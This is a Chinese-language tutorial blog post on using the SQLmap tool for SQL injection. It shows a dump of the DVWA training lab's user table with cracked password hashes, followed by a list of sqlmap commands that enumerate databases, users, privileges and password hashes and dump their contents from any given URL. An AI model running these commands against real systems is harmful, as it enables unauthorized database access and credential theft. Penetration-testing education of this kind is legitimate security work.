SQL注入之SQLmap入门 (注入检测工具)

2019-10-02 23:45:58丽君

使用选项:

    -T : 要枚举的DBMS数据表

    -C: 要枚举的DBMS数据表中的列

    –dump : 转储DBMS数据表项

    SQLmap会提问是否破解密码,按回车确认:

    得到所有用户名与明文密码如下:

    Database: dvwa
    Table: users
    [5 entries]
    +———+———+———————————————+
    | user_id | user| password |
    +———+———+———————————————+
    | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99(password) |
    | 2 | gordonb |e99a18c428cb38d5f260853678922e03 (abc123) |
    | 3 | 1337 |8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
    | 4 | pablo |0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
    | 5 | smithy |5f4dcc3b5aa765d61d8327deb882cf99 (password) |
    +———+———+———————————————+

    这时我们就可以利用admin帐户登录做任何事了。

    总结:

    SQLmap是一个非常强大的工具,可以用来简化操作,并自动处理SQL注入检测与利用。

    [via infosecinstitute]

    下面易采站长站小编为大家分享点实际点的:

    mssql access 直接爆表.然后你懂的
    BT5里面的话前面就要加python
    sqlmap.py -u url --dbs //爆数据库
    sqlmap.py -u url --current-db //爆当前库
    sqlmap.py -u url --current-user //爆当前用户
    sqlmap.py -u url --users 查看用户权限
    sqlmap.py -u url --tables -D 数据库 //爆表段
    sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段
    sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解
    sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段

    翻回来也可以

    sqlmap.py -u url 判断
    sqlmap.py -u url --is-dba -v 这是判断当前数据库的使用者是否是dba
    sqlmap.py -u url --users -v 0 这句的目的是列举数据库的用户
    sqlmap.py -u url --passwords -v 0 这句的目的是获取数据库用户的密码
    sqlmap.py -u url --privileges -v 0 这是判断当前的权限
    sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来
    sqlmap.py -u url --tables -D '表' 爆表
    sqlmap.py -u url --columns -T ‘表’-D ‘数据库’爆列

相关文章 大家在看